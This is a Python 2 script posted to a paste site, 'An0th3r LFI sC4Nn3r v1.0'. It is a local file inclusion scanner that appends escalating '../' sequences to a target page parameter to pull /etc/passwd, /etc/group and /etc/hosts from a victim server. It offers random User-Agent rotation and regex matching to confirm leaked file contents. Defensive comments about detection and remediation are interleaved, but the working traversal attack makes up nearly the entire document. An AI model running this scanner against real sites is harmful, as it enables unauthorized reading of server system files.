Googleinurl

[SCRIPT] An0th3r LFI sC4Nn3r v1.0

Dec 11th, 2014
  1. #!/usr/bin/env  python26
  2.  
  3. import optparse
  4. import sys
  5. import urllib2, socket
  6. import random
  7. import re
  8.  
  #
  # Banner aLFI
  # ASCII-art title plus the author's contact links. It is printed on the
  # usage/help path and again just before a scan starts. The text is static,
  # so the title line "An0th3r LFI sC4Nn3r v1.0" is a convenient string
  # indicator when triaging copies of this script found on a host.
  banner = """
                   $$\      $$$$$$$$\ $$$$$$\\
                   $$ |      $$  _____|\_$$  _|
          $$$$$$\ $$ |      $$ |        $$ |
          \____$$\ $$ |      $$$$$\     $$ |
          $$$$$$$ |$$ |      $$  __|     $$ |
         $$  __$$ |$$ |      $$ |        $$ |
         \$$$$$$$ |$$$$$$$$\ $$ |      $$$$$$\\
          \_______|\________|\__|      \______|



          $$$$$$\\
         $$  __$$\\
         $$ /  \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\  $$$$$$\  $$$$$$\\
         \$$$$$$\ $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\\
          \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
         $$\  $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
         \$$$$$$  |\$$$$$$$\\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
          \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|

                                                                  An0th3r LFI sC4Nn3r v1.0

                                 Written by:

                               Claudio Viviani

                            http://www.homelab.it

                               info@homelab.it
                            homelabit@protonmail.ch

                       https://www.facebook.com/homelabit
                       https://twitter.com/homelabit
                       https://plus.google.com/+HomelabIt1/
             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  """
  48.  
  49.  
  # Command-line interface. -u and -t are mandatory; -p defaults to 0, which is
  # only a placeholder that the script later replaces with 80 or 443 depending
  # on the URL scheme.
  commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n')

  # Option table: (flags, add_option keyword arguments), registered in order so
  # the generated help text lists them exactly as before.
  for flags, settings in (
          (('-u', '--url'),
           dict(action="store",
                dest="url",
                help="Insert URL: http[s]://www.victim.com")),
          (('-t', '--target'),
           dict(action="store",
                dest="target",
                help="Insert page: The name of the page to be scanned (Ex. index.php?page=)")),
          (('-p', '--port'),
           dict(action="store",
                dest="port",
                default=0,
                type="int",
                help="[Insert Port Number] - Default 80 or 443")),
          (('--timeout',),
           dict(action="store",
                dest="timeout",
                default=10,
                type="int",
                help="[Timeout Value] - Default 10")),
          (('-r', '--random-agent'),
           dict(action="store_true",
                dest="randomagent",
                default=False,
                help="[Set random UserAgent]")),
  ):
      commandList.add_option(*flags, **settings)


  options, remainder = commandList.parse_args()


  # Usage: without both a URL and a target page there is nothing to do, so show
  # the banner and the help text and exit with status 1.
  if not (options.url and options.target):
      print(banner)
      print
      commandList.print_help()
      sys.exit(1)
  92. #
  93. # UserAgent list
  94. # Top UA 18/08/2014
  95. # http://techblog.willshouse.com/2012/01/03/most-common-user-agents/
  def randomAgentGen():
      """Build the request headers dict holding only a 'User-Agent' entry.

      When the module-level RANDOMAGENT flag is set, one browser string is
      drawn at random from the fixed list below; otherwise the value is the
      stock "Python-urllib/<major>.<minor>" string of the running interpreter.

      Log-review note: both outcomes are recognisable. The stock value names
      Python-urllib outright, and the list is a frozen 2014 snapshot, so every
      entry is an outdated browser build. The second entry is also malformed
      (no closing ')' after "Mac OS X 10_9_4"); it is kept verbatim here and
      that exact token makes a precise match string for traffic from this
      script.
      """
      agent_pool = [
          'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
          'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
          'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
          'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
          'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
          'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
          'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
          'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
          'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
          'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
          'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
          'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
          'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
          'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
          'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
          'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
          'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
          'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
          'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
          'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
          'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
          'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
          'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
      ]

      if RANDOMAGENT:
          chosen = random.choice(agent_pool)
      else:
          # Same default string urllib2 itself would send.
          chosen = "Python-urllib/%s.%s" % sys.version_info[:2]

      return {'User-Agent': chosen}
  186.  
  # File check list + regexp
  # Maps each file the scan asks for to the pattern a response line must match
  # to count as evidence that the file's contents came back. The patterns
  # describe the line format of passwd, group and hosts files, so they can be
  # reused for response-side inspection: web responses containing several such
  # lines are worth an alert regardless of which tool triggered them.
  CHECK = {
      'etc/passwd': '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$',
      'etc/group': '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$',
      'etc/hosts': '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}:){0,5}::([\da-fA-F]{1,4}:){0,5}[\da-fA-F]{1,4})',
  }
  192.  
  # Copy the parsed options into module-level settings.
  RANDOMAGENT = options.randomagent
  TIMEOUT = options.timeout
  URL = options.url
  PORT = options.port
  TARGET = options.target

  # Split the scheme from the host part. A value without a recognised scheme is
  # treated as plain http. defaultPort is used only when -p was left at 0.
  if URL.startswith("https://"):
      PROTO, defaultPort = "https://", 443
      URL = URL[len(PROTO):]
  elif URL.startswith("http://"):
      PROTO, defaultPort = "http://", 80
      URL = URL[len(PROTO):]
  else:
      PROTO, defaultPort = "http://", 80

  # Note: when the remainder ends in "/", replace() removes every "/" in it,
  # not just the trailing one, so any path given with the URL is collapsed
  # into the host string.
  if URL.endswith("/"):
      URL = URL.replace("/", "")

  if PORT == 0:
      PORT = defaultPort
  221.  
  # Fail fast if the host name does not resolve. The lookup result is thrown
  # away, so later requests are still addressed to the name as typed rather
  # than to an IP address.
  try:
      socket.gethostbyname(URL)
  except socket.gaierror:
      # could not resolve
      print('Hostname could not be resolved. Exiting')
      sys.exit()

  # One header set is built here and reused for every request of the run, so
  # the User-Agent does not change between probes.
  headers = randomAgentGen()

  # Banner plus a short summary of the effective settings.
  print(banner)
  print
  for label, value in (('[*] URL:\t', PROTO+URL),
                       ('[*] TARGET:\t', TARGET),
                       ('[*] PORT:\t', str(PORT))):
      print(label+value)
  print
  239.  
  # Probe loop.
  #
  # For each signature file in CHECK, ten requests are sent, each with one more
  # "../" between TARGET and the file name. The traversal string is appended
  # raw, with no encoding, and the port is always spelled out in the URL.
  #
  # What this looks like from the server side: a short burst of GETs against a
  # single page parameter whose value is a growing run of "../" followed by
  # etc/passwd, etc/group or etc/hosts, all carrying the same User-Agent. A rule
  # matching "../" sequences in request parameters covers every probe sent
  # here. The underlying flaw is a file path built from request input;
  # resolving the final path and checking it against an allow-listed directory
  # or a fixed set of page names removes it.
  found = 0

  for fileCheck, fileRegexp in CHECK.items():
      checkValidRegexp = re.compile(fileRegexp, re.IGNORECASE)

      for scanLFI in range(1, 11):
          probe = PROTO+URL+':'+str(PORT)+'/'+TARGET+("../" * scanLFI)+fileCheck

          try:
              req = urllib2.Request(probe, None, headers)
              connection = urllib2.urlopen(req, None, TIMEOUT)
              response = connection.readlines()
              getcode = connection.getcode()

              # Number of body lines that look like the requested file; only
              # counted when the status is 200.
              sentinel = sum(1 for checkResponse in response
                             if getcode == 200 and checkValidRegexp.match(checkResponse))

              # A single matching line is not reported; at least two are needed.
              if sentinel > 1:
                  print('[+] '+probe+'\t <--- FOUND')
                  found = found + 1
              else:
                  print('[+] '+probe)

          # HTTP error - 4xx, 5xx: logged like an ordinary miss, scan continues
          except urllib2.HTTPError:
              print('[+] '+probe)

          # Connection error - Connection refused, No route to host: abort the run
          except urllib2.URLError:
              print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT))
              sys.exit()

  if found < 1:
      print
      print('[+] Nothing found')